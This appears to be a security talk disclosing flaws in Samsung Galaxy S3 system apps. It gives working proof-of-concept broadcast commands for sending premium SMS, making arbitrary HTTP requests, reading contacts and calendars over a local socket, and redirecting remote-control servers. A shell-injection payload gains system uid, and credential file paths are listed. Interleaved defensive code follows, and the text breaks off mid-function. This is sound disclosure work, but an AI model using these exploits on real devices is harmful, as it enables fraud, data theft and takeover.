Android OEM’s applications (in)security and backdoors without permission André Moulu [email protected]


  • Android OEM’s applications (in)security and backdoors without permission

    André [email protected]

  • Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation

    Plan

    1 Context and objectives

    2 Android introduction

    3 Android security model

    4 Methodology

    5 Toward a backdoor without permission

    6 Post-exploitation

    7 Scope of the vulnerabilities

    8 Conclusion

    http://www.quarkslab.com

  • Context and objectives

    Why Android?

    Most used mobile OS

    Security often questioned because of the large amount of malware

    Unofficial markets (warez)

    Show how an application without any permission can take control of a smartphone

  • Context and objectives

    Targeted user

    Security-aware user

    Doesn’t use alternative markets

    Checks permissions before installing an application

    Targeted smartphone

    Samsung Galaxy S3 (I9300)

    50 million copies sold (March 2013)

    More precisely, the Samsung overlay on the I9300

    Some of these applications may also be present on other models

    Some vulnerabilities may impact other models (S2, S4, Note 1/2, ...)

    The vulnerable applications can’t be deleted without root access

  • Plan

    1 Context and objectives

    2 Android introduction

      Android system and the applications

      Classical components of an Android application

      The communication between components

      The exposition of components

    3 Android security model

    4 Methodology

    5 Toward a backdoor without permission

    6 Post-exploitation

    7 Scope of the vulnerabilities

    8 Conclusion

  • Android system and the applications

    The Android system

    Generalities and common knowledge

    Mobile OS (smartphone/tablet), "open source"

    Based on Linux

    Developed in C and Java

    A special virtual machine: DalvikVM

    Dalvik Bytecode (DEX/ODEX)

    What is an Android application?

    APK file (actually a ZIP file)

    APK’s most important files:

    AndroidManifest.xml (configuration, permissions, components, ...)

    classes.dex (executable bytecode)

    Native libraries as .so files (JNI)

    Each application has a unique name (package name) and is signed by its developer (certificate)

  • Classical components of an Android application

    The applicative components

  • The communication between components

    The Intent: source of communication in Android

  • The exposition of components

    Can we talk to this component?

    exported or not, that’s the question

    By default, components are not exported

    Special case: ContentProvider

    The component status, exported or not, is defined by AndroidManifest.xml

    The attribute exported=[true|false]

    Presence of an intent-filter (the component is automatically exported)

    A component can be exported but protected by a permission
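    As an added example (not the ASAManifest script from the talk and not code from the slides), the following Python applies the export rules listed above to a manifest and reports which components another application can reach and whether a permission guards them. The manifest, package name and component names are constructed; the provider default for targetSdkVersion below 17 is an assumed platform rule that the slide only names as a special case.

```python
# Added example, not the ASAManifest script from the talk: apply the export
# rules from this slide to a manifest and list the components another app can
# reach, together with the permission (if any) that guards each of them.
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")

# Constructed sample manifest (package and component names are invented):
# .ui.BgSender is exported by its intent-filter and nothing guards it.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.oemapp" android:sharedUserId="android.uid.system">
  <uses-sdk android:minSdkVersion="8" android:targetSdkVersion="17"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <application>
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <receiver android:name=".ui.BgSender">
      <intent-filter>
        <action android:name="com.example.oemapp.QUICKSEND"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".ui.InternalReceiver" android:exported="false">
      <intent-filter>
        <action android:name="com.example.oemapp.INTERNAL"/>
      </intent-filter>
    </receiver>
    <service android:name=".SyncService" android:exported="true"
        android:permission="com.example.oemapp.permission.SYNC"/>
    <provider android:name=".DataProvider"
        android:authorities="com.example.oemapp.data"/>
  </application>
</manifest>
"""


def _attr(elem, name, default=None):
    """Read an attribute from the android: namespace."""
    return elem.get("{%s}%s" % (ANDROID_NS, name), default)


def export_reason(component, target_sdk):
    """Return why the component is exported, or None when it is not.

    Rules from the slide: an explicit android:exported wins; otherwise the
    presence of an <intent-filter> exports the component; otherwise it is not
    exported. ContentProvider special case (assumed platform default, the slide
    only names it): a provider without the attribute is exported when the
    application targets an SDK below 17.
    """
    explicit = _attr(component, "exported")
    if explicit is not None:
        return "exported attribute" if explicit.lower() == "true" else None
    if component.find("intent-filter") is not None:
        return "intent-filter"
    if component.tag == "provider" and target_sdk < 17:
        return "provider default (targetSdkVersion < 17)"
    return None


def guarding_permissions(component):
    """Permissions a caller must hold to reach the component."""
    names = [_attr(component, "permission")]
    if component.tag == "provider":
        names += [_attr(component, "readPermission"),
                  _attr(component, "writePermission")]
    return [n for n in names if n]


def analyze_manifest(xml_text):
    """Return the exported components with their export reason and guards."""
    root = ET.fromstring(xml_text)
    uses_sdk = root.find("uses-sdk")
    target_sdk = int(_attr(uses_sdk, "targetSdkVersion", 1)) if uses_sdk is not None else 1
    findings = []
    for comp in root.find("application"):
        if comp.tag not in COMPONENT_TAGS:
            continue
        reason = export_reason(comp, target_sdk)
        if reason is None:
            continue
        findings.append({"type": comp.tag, "name": _attr(comp, "name"),
                         "reason": reason,
                         "permissions": guarding_permissions(comp)})
    return {"package": root.get("package"),
            "sharedUserId": _attr(root, "sharedUserId"),
            "targetSdkVersion": target_sdk,
            "exported": findings}


def unprotected(report):
    """Names of exported components that any application can talk to."""
    return [f["name"] for f in report["exported"] if not f["permissions"]]


if __name__ == "__main__":
    report = analyze_manifest(SAMPLE_MANIFEST)
    print("package:", report["package"], "sharedUserId:", report["sharedUserId"])
    for f in report["exported"]:
        guard = ", ".join(f["permissions"]) or "NO PERMISSION"
        print("%-8s %-20s via %-18s guarded by %s"
              % (f["type"], f["name"], f["reason"], guard))
```

    Adding android:exported="false" to the unguarded receiver, or an android:permission attribute, removes it from the unprotected list, which is the check to run over every APK of a vendor overlay before trusting its permission model.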

  • The exposition of components

    Example of AndroidManifest.xml

  • Plan

    1 Context and objectives

    2 Android introduction

    3 Android security model

      Applications isolation

      The permission system

    4 Methodology

    5 Toward a backdoor without permission

    6 Post-exploitation

    7 Scope of the vulnerabilities

    8 Conclusion

  • Applications isolation

    One user per application

    Security by isolation

    Default behaviour:

    Each application has a dedicated user (and therefore a UID) on the system

    Special case:

    An application can ask to share a UID with another application

    sharedUserId mechanism (AndroidManifest.xml)

    In order to share a UID, the 2 applications must be signed with the same certificate

    Consequences

    Isolation between applications in memory (process)

    Isolation on the filesystem

    Does not protect against world-readable/writable files

  • The permission system

    Application restrictions

    Least privilege security

    Permission to protect against dangerous actions:

    SD card write access, INTERNET access, sending SMS, ...

    By default, an application doesn’t have any permission

    You need to ask for them explicitly in AndroidManifest.xml

    Asked permissions are shown to the user at installation

    Boolean choice

    A permission can protect:

    Functions: AccountManager.getAccounts() (GET_ACCOUNTS)

    Intents: android.intent.action.CALL (CALL_PHONE)

    Components: content://contacts (READ_CONTACTS, ...)

    A permission is given to a UID and not to a package name

    The permission model is applied to native code too

    All permissions of each application with the same sharedUserId are combined

  • The permission system

    Application restrictions

    Consequences of the permission model

    Components can be protected

    The user "knows" what the application can do when it is installed, and thus the associated risks

    Limits the impact in case of a vulnerable application

  • Plan

    1 Context and objectives

    2 Android introduction

    3 Android security model

    4 Methodology

      A huge attack surface

      Vulnerability research

    5 Toward a backdoor without permission

    6 Post-exploitation

    7 Scope of the vulnerabilities

    8 Conclusion

  • A huge attack surface

    The attack surface

    Important folders

    We want to build a backdoor targeting an Android smartphone

    Userland vulnerabilities (easy to find, easy to exploit)

    Folders customized by manufacturers on an Android smartphone:

    /system/app

    /system/framework

    /system/bin

    /system/lib

    The content of these folders may also differ between operators

  • A huge attack surface

    A large number of applications

    Only two folders examined, but a substantial attack surface

    216 APK in /system/app

    To compare: 91 APK for the Nexus 4

  • Vulnerability research

    Automation

    Constraints

    Many applications: automation is needed to find the interesting ones

    Then audit by hand (reverse engineering)

    Exploitation of vulnerabilities with few or no permissions at all

    Creation of some scripts: ASA

    Based on Androguard (great framework)

    ASAManifest: analyzes the manifest of an application and tells which components are exported and under what conditions

    ASADatabase: analyzes a large number of applications as ASAManifest does and checks for sensitive API usage. The results are stored in a MongoDB database.

    ASADiff (ongoing): diff between two versions of a system, for example to detect vulnerability patching.

  • Vulnerability research

    ASAManifest

  • Vulnerability research

    ASADatabase: examples of queries on MongoDB

    Applications with the INSTALL_PACKAGES permission

        > db.gs3.find({permission:/INSTALL_PACKAGES/},{filename:1,_id:0})
        { "filename" : "DttSupport.apk" }
        { "filename" : "Kies.apk" }
        { "filename" : "MtpApplication.apk" }
        { "filename" : "PackageInstaller.apk" }
        [...]

    Number of sharedUserId system applications

        > db.gs3.find({"manifest.sharedUserId":"android.uid.system"},{}).count()
        41

    Which ones really use INSTALL_PACKAGES?

        > db.gs3.find({permission:/INSTALL_PACKAGES/},{filename:1,_id:0}).count()
        11
        > db.gs3.find({permission:/INSTALL_PACKAGES/,use_installPackage:true},
        {filename:1,_id:0}).count()
        10
        > db.gs3.find({permission:/INSTALL_PACKAGES/,use_installPackage:false},
        {filename:1,_id:0})
        { "filename" : "MtpApplication.apk" }

  • Plan

    1 Context and objectives

    2 Android introduction

    3 Android security model

    4 Methodology

    5 Toward a backdoor without permission

      Backdoor’s features

      SD Card: Android and backward compatibility...

      SMS/MMS sending and files exfiltration

      Arbitrary HTTP requests execution

      Getting C.R.U.D rights on SMS/Contacts/Memo and more

      Sync for fun and profit

      I don't need root when I have system

    6 Post-exploitation

    7 Scope of the vulnerabilities

    8 Conclusion

  • Backdoor’s features

    Objectives

  • SD Card: Android and backward compatibility...

    SD Card: a protected storage?

    Once upon a time... Android

    First versions: total access to the SD Card

    read & write access

    Current state

    Write access: WRITE_EXTERNAL_STORAGE

    Read access: currently "tolerated" without permission

    Dangerous for user privacy (internet + sdcard)

    Introduction of the READ_EXTERNAL_STORAGE permission

    "Protect the SD Card" in system parameters (JB)

    And what about backward compatibility?

    From the Android documentation, if minSdkVersion and targetSdkVersion

  • SD Card: Android and backward compatibility...

    Objectives

  • SMS/MMS sending and files exfiltration

    Vuln1 - SecMms.apk

    Malware and premium SMS

    Current Android malware asks for the SEND_SMS permission

    Easily detectable and suspect for a user

    What about malware which can send premium SMS without asking for permission?

    There is an app for that

    SecMms.apk

    exported BroadcastReceiver -> ui.MmsBGSender

    A well-formed Intent allows sending arbitrary SMS/MMS

    PoC (attachments can also be added)

        shell@android:/ $ am broadcast -a com.android.mms.QUICKSND --es mms_to "*PHONENUMBER*" --es mms_subject "*SUBJECT*" --es mms_text "*MESSAGE*"

  • SMS/MMS sending and files exfiltration

    Objectives

    http://www.quarkslab.com


    Arbitrary HTTP requests execution

    Vuln2 - PCWClientS.apk

    PCWReceiver

    When an Intent is received with com.sec.pcw.device.HTTP_REQUEST_RETRY as action

    The body, uri and pushType attributes are extracted and an HTTP POST request is executed based on them

    PoC

        shell@android:/ $ am broadcast -a com.sec.pcw.device.HTTP_REQUEST_RETRY --es uri *URL* --es body *POST_DATA* --es pushType *PUSHTYPE*

    Arbitrary HTTP requests execution: Objectives (figure)


    Getting C.R.U.D rights on SMS/Contacts/Memo and more

    Vuln3 - wssyncmlnps.apk

    Typical problems with the manufacturer's overlay

    This vulnerability was patched by Samsung before we reported it

    Patched on the S3 but not on the S2, Tab 1, Note 1

    Special case: the INTERNET permission is needed

    (creation of a socket)

    smlNpsReceiver

    The application exports a BroadcastReceiver smlNpsReceiver

    It answers to Intents related to Kies:

        com.intent.action.KIES_WSSERVICE_START
        com.intent.action.KIES_WSSERVICE_START_WIFI


    Getting C.R.U.D rights on SMS/Contacts/Memo and more

    Vuln3 - wssyncmlnps.apk

    smlNpsReceiver

        public void onReceive(Context paramContext, Intent paramIntent)
        {
            [...]
            if(paramIntent.getAction()
                .equals("com.intent.action.KIES_WSSERVICE_START"))
            {
                smlDebug.SML_DEBUG(2, "KIES_WSSERVICE_START");
                wifi_connected = false;
                usb_connected = true;
                paramContext.stopService(
                    new Intent(paramContext, smlNpsService.class)
                );
                paramContext.startService(
                    new Intent(paramContext, smlNpsService.class)
                );
            }
            [...]
        }


    Getting C.R.U.D rights on SMS/Contacts/Memo and more

    Vuln3 - wssyncmlnps.apk

    smlNpsService

    When it starts, it runs NpsServiceTask in a thread

    Listens on 0.0.0.0:1108 (TCP)

    Each connection is handled by smlNpsHandler in a separate thread

    The method work() is called to handle the received data
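    A service that binds to 0.0.0.0 is reachable from every network the phone joins, not only from the USB tether Kies expects. The check below is an added example, not part of the talk: it parses netstat output in the column layout of Android's busybox-style netstat and lists TCP listeners bound to all interfaces. The sample output is constructed; the :::1108 line reproduces the one shown later in the slides, the other lines are made up.

```python
"""Find TCP listeners bound to every interface in netstat output.

Added example, not part of the original talk. The sample output is
constructed in the column layout of Android's busybox-style netstat; the
:::1108 line reproduces the one shown in the slides, the others are made up.
"""

# Local-address hosts that mean "every interface", IPv4 and IPv6.
WILDCARD_HOSTS = {"0.0.0.0", "::", "*"}

SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address          Foreign Address        State
tcp        0      0 127.0.0.1:7777         0.0.0.0:*              LISTEN
tcp6       0      0 :::1108                :::*                   LISTEN
tcp6       0      0 ::ffff:10.0.2.15:5228  ::ffff:10.0.2.2:443    ESTABLISHED
udp        0      0 0.0.0.0:68             0.0.0.0:*
"""


def parse_listeners(netstat_output):
    """Yield (proto, host, port) for every TCP socket in LISTEN state."""
    for line in netstat_output.splitlines():
        fields = line.split()
        # proto recv-q send-q local-address foreign-address state
        if len(fields) < 6 or not fields[0].startswith("tcp"):
            continue
        if fields[5] != "LISTEN":
            continue
        host, _, port = fields[3].rpartition(":")
        yield fields[0], host, int(port)


def wildcard_listeners(netstat_output, watched_ports=frozenset({1108})):
    """Return the listeners reachable from any network the device joins.
    Ports in watched_ports (1108 is the port the talk's service opens) are
    tagged so a reviewer sees them at once."""
    found = []
    for proto, host, port in parse_listeners(netstat_output):
        if host in WILDCARD_HOSTS:
            found.append({"proto": proto, "port": port, "watched": port in watched_ports})
    return found


def check_sample():
    return wildcard_listeners(SAMPLE_NETSTAT)


if __name__ == "__main__":
    for entry in check_sample():
        flag = "  <-- port of the Kies sync service" if entry["watched"] else ""
        print("%s port %d listens on all interfaces%s" % (entry["proto"], entry["port"], flag))
```

    On a device the same function can be fed the output of `adb shell netstat`; a wildcard listener that appears only after a broadcast is a sign that an exported receiver, like smlNpsReceiver here, is the switch that turns the service on.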


    Getting C.R.U.D rights on SMS/Contacts/Memo and more

    Vuln3 - wssyncmlnps.apk

    smlNpsHandler.work()

        protected void work()
        {
            if(this.socket != 0)
            {
                socketIS = this.socket.getInputStream();
                socketOS = this.socket.getOutputStream();
                cmdLine = this.readLine(socketIS);
                if((cmdLine != 0) && (cmdLine.length() != 0))
                {
                    cmdInformation = new String[3];
                    v5 = cmdLine.indexOf("BEGIN");
                    cmdInformation[0] = cmdLine.substring(0, 3);
                    if(v5


    Getting C.R.U.D rights on SMS/Contacts/Memo and more

    Vuln3 - wssyncmlnps.apk

    smlNpsHandler.work()

        case 70:
            v1 = this.GetContact(cmdInformation[1]);
            v2 = 0;
            break;
        [...]
        case 72:
            v1 = this.GetContactsIndexArray(
                com.wssnps.database.smlContactItem$StorageType.SMLDS_PIM_ADAPTER_CONTACT_PHONE.getId());
            v2 = 0;
            break;
        [...]
        case 90:
            v1 = this.GetCalendar(cmdInformation[1]);
            v2 = 0;
            break;
        [...]


    Getting C.R.U.D rights on SMS/Contacts/Memo and more

    Vuln3 - wssyncmlnps.apk

    smlNpsHandler.work()

        case 453:
            v1 = Integer.valueOf(cmdInformation[1].trim()).intValue();
            if(v1


    Getting C.R.U.D rights on SMS/Contacts/Memo and more

    Vuln3 - wssyncmlnps.apk

    PoC

        $ adb shell am broadcast -a com.intent.action.KIES_WSSERVICE_START
        Broadcasting: Intent { act=com.intent.action.KIES_WSSERVICE_START }
        Broadcast completed: result=0
        $ adb shell netstat |grep 1108
        tcp6 0 0 :::1108 :::* LISTEN
        $ adb forward tcp:1108 tcp:1108
        $ nc localhost 1108 -v
        Connection to localhost 1108 port [tcp/*] succeeded!

        090 1 # getCalendar(1)
        0
        BEGIN:VCALENDAR
        VERSION:1.0
        BEGIN:VEVENT
        SUMMARY;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:Sstic 2013
        DESCRIPTION;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:Conf
        LOCATION;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:Rennes
        DTSTART:20130605T170000Z
        DTEND:20130607T180000Z
        X-ALLDAY:UNSET
        X-CALENDARGROUP:1
        UID:000000000000000000000000000000000000000000000001
        END:VEVENT
        END:VCALENDAR


    Getting C.R.U.D rights on SMS/Contacts/Memo and more

    Vuln3 - wssyncmlnps.apk

    PoC

        072 # get the ids of the contacts on the smartphone (not the SIM)
        0
        2 # number of contacts
        8,9, # ids of the contacts

        070 9 # getContact(9)
        0
        BEGIN:VCARD
        VERSION:2.1
        N;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:;Kevin;;;;;;;
        TEL;HOME;CELL:06 06 06 06 06
        EMAIL;HOME;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:[email protected]:1
        X-ACCOUNT:vnd.sec.contact.phone;vnd.sec.contact.phone
        END:VCARD

        453 32 # install APK from /sdcard/restore/
        aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

    Some available features...

    C.R.U.D on the SMS/MMS/contacts/memos/calendar/call log/...

    Backup of mail accounts

    Installation of arbitrary applications


    Getting C.R.U.D rights on SMS/Contacts/Memo and more

    Vuln3 - wssyncmlnps.apk

    How was it patched?

    A permission was added on the component for the action KIES_WSSERVICE_START

    android.permission.COM_WSSNPS has a protectionLevel of signatureOrSystem
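    Adding a permission only closes the hole if its protectionLevel keeps third-party apps from requesting it: normal and dangerous permissions can be declared by any app, signature and signatureOrSystem cannot. The script below is an added example, not code from the talk or from wssyncmlnps.apk: for each component that names an android:permission, it looks the permission up among the manifest's own <permission> declarations and reports whether the guard is strong, weak, or undeclared here. The manifest is constructed; the permission name, its protectionLevel and the KIES_WSSERVICE_START action come from the slides, the package name and the other components are placeholders.

```python
"""Judge whether the permission guarding a component keeps third-party apps
out, based on its declared protectionLevel.

Added example, not code from the original talk or from wssyncmlnps.apk. The
manifest is constructed: the permission name, its protectionLevel and the
KIES_WSSERVICE_START action come from the slides; the package name and the
other components are placeholders.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")
# A third-party app obtains these just by listing them in its own manifest
# (normal: granted silently; dangerous: after a user prompt).
WEAK_LEVELS = {"normal", "dangerous"}
# These require the requester to be signed with the declaring app's key, or
# (signatureOrSystem) to be installed in the system image.
STRONG_LEVELS = {"signature", "signatureOrSystem"}

SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.wssnps">
  <permission android:name="android.permission.COM_WSSNPS"
      android:protectionLevel="signatureOrSystem"/>
  <permission android:name="com.example.permission.DEBUG"
      android:protectionLevel="normal"/>
  <application>
    <!-- the patched receiver: guarded by a signatureOrSystem permission -->
    <receiver android:name=".smlNpsReceiver"
        android:permission="android.permission.COM_WSSNPS">
      <intent-filter>
        <action android:name="com.intent.action.KIES_WSSERVICE_START"/>
      </intent-filter>
    </receiver>
    <!-- guarded, but by a permission any app may request -->
    <receiver android:name=".DebugReceiver"
        android:permission="com.example.permission.DEBUG">
      <intent-filter><action android:name="com.example.DEBUG"/></intent-filter>
    </receiver>
    <!-- guarded by a permission declared in some other package -->
    <service android:name=".HelperService"
        android:permission="com.other.permission.HELPER"/>
  </application>
</manifest>"""


def _attr(elem, name, default=None):
    return elem.get("{%s}%s" % (ANDROID_NS, name), default)


def declared_permissions(root):
    """Map permission name -> base protectionLevel for <permission> elements.
    Flag suffixes such as 'signature|privileged' are reduced to the base."""
    return {
        _attr(p, "name"): _attr(p, "protectionLevel", "normal").split("|")[0]
        for p in root.iter("permission")
    }


def guard_strength(manifest_xml):
    """Return {component name: verdict} for each component that names an
    android:permission. 'strong': only same-signer/system apps pass;
    'weak': any app can request the permission; 'unknown': the permission
    is not declared in this manifest, so its level must be checked in the
    package that declares it."""
    root = ET.fromstring(manifest_xml)
    levels = declared_permissions(root)
    verdicts = {}
    for comp in root.iter():
        if comp.tag not in COMPONENT_TAGS:
            continue
        perm = _attr(comp, "permission")
        if perm is None:
            continue
        level = levels.get(perm)
        if level in STRONG_LEVELS:
            verdict = "strong"
        elif level in WEAK_LEVELS:
            verdict = "weak"
        else:
            verdict = "unknown"
        verdicts[_attr(comp, "name")] = verdict
    return verdicts


def check_sample():
    return guard_strength(SAMPLE_MANIFEST)


if __name__ == "__main__":
    for name, verdict in check_sample().items():
        print("%-20s %s" % (name, verdict))
```

    A weak verdict is worth the same attention as a missing permission: the guard exists in the manifest but an unprivileged app can ask for it and pass. The unknown case needs the declaring package's manifest, since a permission is defined once system-wide by whichever package declares it first.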

    Getting C.R.U.D rights on SMS/Contacts/Memo and more: Objectives (figure)

    Sync for fun and profit

    Vuln4 - Sync and remote control applications...

    FmmDM, FmmDS, ...

    There are applications to do data sync and remote control of the smartphone

    "Security" => "Remote controls"

    The user can remote control his phone via http://samsungdive.com/


    Sync for fun and profit

    Vuln4 - sync and remote control applications...

    Vulnerabilities

    These applications export a BroadcastReceiver

    With the correct Intent, you can change the default server used by the smartphone for sync and remote control

    PoC for FmmDM

        shell@android:/ $ am broadcast -a android.intent.action.dsm.UPDATE_URL --es DMServer "http://sh4ka.fr:80/test/trololo.php"

    Vuln4 - sync and remote control applications... (figures)

    I don't need root when I have system

    Vuln5 - serviceModeApp.apk

    ASADatabase to the rescue

    Search in the database for applications with:

    sharedUserId = system

    Usage of APIs for command execution/dynamic code loading

    Among these applications: serviceModeApp.apk

    A strange AndroidManifest.xml file


    I don't need root when I have system

    Vuln5 - serviceModeApp.apk

    FTATDumpReceiver.onReceive()

        public void onReceive(Context paramContext, Intent paramIntent)
        {
            String str1 = paramIntent.getAction();
            Log.i("FTATDumpReceiver", "onReceive action=" + str1);
            if (str1.equals("com.android.sec.FTAT_DUMP"))
            {
                String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME");
                Calendar localCalendar = Calendar.getInstance();
                String str4 = str3 + new DecimalFormat("0000").format(localCalendar.get(1));
                [...]
                String str9 = str8 + new DecimalFormat("00").format(localCalendar.get(13));
                Log.i("FTATDumpReceiver", "Dump Filename is" + str9);
                Intent localIntent2 = new Intent(paramContext, FTATDumpService.class);
                localIntent2.setFlags(268435456);
                localIntent2.putExtra("FILENAME", str9);
                paramContext.startService(localIntent2);
            }
            [...]
        }


    I don't need root when I have system

    Vuln5 - serviceModeApp.apk

    FTATDumpService.onStartCommand()

    public int onStartCommand(Intent paramIntent, int paramInt1, int paramInt2)
    {
      Log.i("FTATDumpService", "onStartCommand()");
      this.mHandler.sendEmptyMessage(1005);
      final String str = paramIntent.getStringExtra("FILENAME");
      [...]
      new Thread(new Runnable()
      {
        public void run()
        {
          FTATDumpService.this.sendMessage(
              FTATDumpService.access$600(FTATDumpService.this),
              FTATDumpService.this.mHandler.obtainMessage(1014)
          );
          // str (attacker controlled) is concatenated into a shell command line
          if (FTATDumpService.this.DoShellCmd("dumpstate > /data/log/" + str + ".log"))
            FTATDumpService.this.mHandler.sendEmptyMessage(1015);
          [...]
        }
      }).start();
      return 0;
    }

    FTATDumpService.doShellCmd()

    private boolean DoShellCmd(String paramString)
    {
      Log.i("FTATDumpService", "DoShellCmd : " + paramString);
      // "sh -c": the whole string, file name included, is parsed by the shell,
      // so ';', '#', quotes and redirections inside FILENAME are interpreted.
      String[] arrayOfString = new String[3];
      arrayOfString[0] = "/system/bin/sh";
      arrayOfString[1] = "-c";
      arrayOfString[2] = paramString;
      Log.i("FTATDumpService", "exec command");
      Runtime.getRuntime().exec(arrayOfString).waitFor();
      Log.i("FTATDumpService", "exec done");
      Log.i("FTATDumpService", "DoShellCmd done");
      return true;
    }

    Srsly?

    Vuln5 - serviceModeApp.apk

    PoC

    $ adb shell am broadcast -a com.android.sec.FTAT_DUMP \
        --es FILENAME '../../../../../dev/null;/system/bin/id > /sdcard/shellescape;#'
    Broadcasting: Intent { act=com.android.sec.FTAT_DUMP (has extras) }
    Broadcast completed: result=0
    $ adb shell cat /sdcard/shellescape
    uid=1000(system) gid=1000(system) groups=1001(radio),1006(camera),1007(log),
      1015(sdcard_rw),1023(media_rw),1028(sdcard_r),2001(cache),3001(net_bt_admin),
      3002(net_bt),3003(inet),3007(net_bw_acct)

    Why it works: the service runs "/system/bin/sh -c 'dumpstate > /data/log/FTAT_<FILENAME><timestamp>.log'". The ';' inside FILENAME ends the redirected dumpstate command (its target path does not even need to exist), "/system/bin/id > /sdcard/shellescape" then runs as a second command with the service's uid 1000, and the trailing '#' turns the timestamp and ".log" appended by the receiver into a shell comment. An installed application needs no permission to do the same: sendBroadcast() of an Intent with action com.android.sec.FTAT_DUMP and a FILENAME extra reaches the exported receiver exactly as "am broadcast" does. When the command is issued as a one-shot "adb shell ..." from the host, the whole am invocation must be quoted once more, otherwise the device shell splits it on ';' before am ever sees it.
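    The receiver/service pair above, rewritten so that the FILENAME extra can never reach a shell. This is an added example, not code from the deck or from Samsung's serviceModeApp; the class name, the /data/log directory and the "FTAT_" prefix are assumptions that mirror the decompiled code.

```java
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.util.regex.Pattern;

import android.app.Service;
import android.content.Intent;
import android.os.IBinder;
import android.util.Log;

/**
 * Hardened counterpart of the FTATDumpReceiver/FTATDumpService chain
 * (added example, not the deck's or Samsung's code; names are assumed).
 * Three independent defences:
 *  1. Manifest: declare the receiver and the service with android:exported="false"
 *     (or protect them with a signature-level permission) so that a third-party
 *     app cannot reach them in the first place.
 *  2. Input: FILENAME is matched against a strict allowlist before use, so
 *     "../", ";", "#", quotes and spaces are rejected rather than escaped.
 *  3. Execution: dumpstate is started through ProcessBuilder with a fixed
 *     argument vector and its output is written by Java; no "/system/bin/sh -c"
 *     ever parses a string that contains caller input.
 */
public class HardenedDumpService extends Service {
    private static final String TAG = "HardenedDumpService";
    private static final File LOG_DIR = new File("/data/log");          // assumed, as in the deck
    private static final Pattern SAFE_NAME = Pattern.compile("[A-Za-z0-9_]{1,64}");

    /** Returns "FTAT_" + name if the extra is acceptable, null otherwise. */
    static String validateName(String name) {
        if (name == null || !SAFE_NAME.matcher(name).matches()) {
            return null;
        }
        return "FTAT_" + name;   // the app may append its own timestamp here, as before
    }

    /** Builds the output path and refuses anything that resolves outside LOG_DIR. */
    static File resolveTarget(String validatedName) throws IOException {
        File target = new File(LOG_DIR, validatedName + ".log").getCanonicalFile();
        if (!LOG_DIR.getCanonicalFile().equals(target.getParentFile())) {
            throw new IOException("refusing path outside " + LOG_DIR + ": " + target);
        }
        return target;
    }

    /** Runs dumpstate without a shell and copies its stdout/stderr into target. */
    static int runDumpstate(File target) throws IOException, InterruptedException {
        Process p = new ProcessBuilder("/system/bin/dumpstate")
                .redirectErrorStream(true)
                .start();
        FileOutputStream out = new FileOutputStream(target);
        try {
            InputStream in = p.getInputStream();
            byte[] buf = new byte[8192];
            int n;
            while ((n = in.read(buf)) != -1) {
                out.write(buf, 0, n);
            }
        } finally {
            out.close();
        }
        return p.waitFor();
    }

    @Override
    public int onStartCommand(Intent intent, int flags, final int startId) {
        final String name = validateName(intent == null ? null : intent.getStringExtra("FILENAME"));
        if (name == null) {
            Log.w(TAG, "rejected FILENAME extra");
            stopSelf(startId);
            return START_NOT_STICKY;
        }
        new Thread(new Runnable() {
            @Override
            public void run() {
                try {
                    File target = resolveTarget(name);
                    Log.i(TAG, "dumpstate exit=" + runDumpstate(target) + " -> " + target);
                } catch (IOException e) {
                    Log.e(TAG, "dump failed", e);
                } catch (InterruptedException e) {
                    Thread.currentThread().interrupt();
                } finally {
                    stopSelf(startId);
                }
            }
        }).start();
        return START_NOT_STICKY;
    }

    @Override
    public IBinder onBind(Intent intent) {
        return null;
    }
}
```

    The allowlist alone defeats the PoC payload, but the absence of "sh -c" is the defence that survives a future change to the name format: with an argument vector there is no second parser between the app and dumpstate. The manifest change matters most, since a debug receiver that third-party apps cannot address needs no input validation at all.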

    Inventory of the permissions obtained

    Inventory

    Combination of all the permissions of the sharedUserId=system applications

    A total of 156 permissions
    Like android.permission.INSTALL_PACKAGES (pm install package.apk)
    Like access to mail accounts, SMS, internet, ...

    We can inject code inside other applications (dalvik-cache)

    Sensitive information can be read

    Wifi keys: /data/misc/wifi/wpa_supplicant.conf

    Password/pincode/pattern: gesture.key, password.key, ...

    Mail accounts and Google Account token: /data/system/users/X/accounts.db
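    How the "156 permissions" figure is obtained, as an added example that is not part of the deck: the union of every <uses-permission> over all packages that declare android:sharedUserId="android.uid.system", computed from the text printed by "aapt dump xmltree <apk> AndroidManifest.xml". The three manifest dumps built in main() are constructed for illustration; their package names and permission lists are invented.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.Map;
import java.util.TreeMap;
import java.util.TreeSet;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/**
 * Added example (not from the deck): union of the permissions requested by every
 * package sharing a given android:sharedUserId, parsed from `aapt dump xmltree`.
 */
public class SharedUidPermissions {
    private static final Pattern SHARED_UID = Pattern.compile("android:sharedUserId\\([^)]*\\)=\"([^\"]+)\"");
    private static final Pattern PACKAGE    = Pattern.compile("^A: package=\"([^\"]+)\"");
    private static final Pattern PERM_NAME  = Pattern.compile("android:name\\([^)]*\\)=\"([^\"]+)\"");

    /** One parsed manifest. */
    public static final class Manifest {
        public String pkg;
        public String sharedUserId;                       // null when the APK declares none
        public final TreeSet<String> permissions = new TreeSet<String>();
    }

    /** Parses one xmltree dump; only <uses-permission> elements contribute names. */
    public static Manifest parse(String xmltree) {
        Manifest m = new Manifest();
        boolean inUsesPermission = false;
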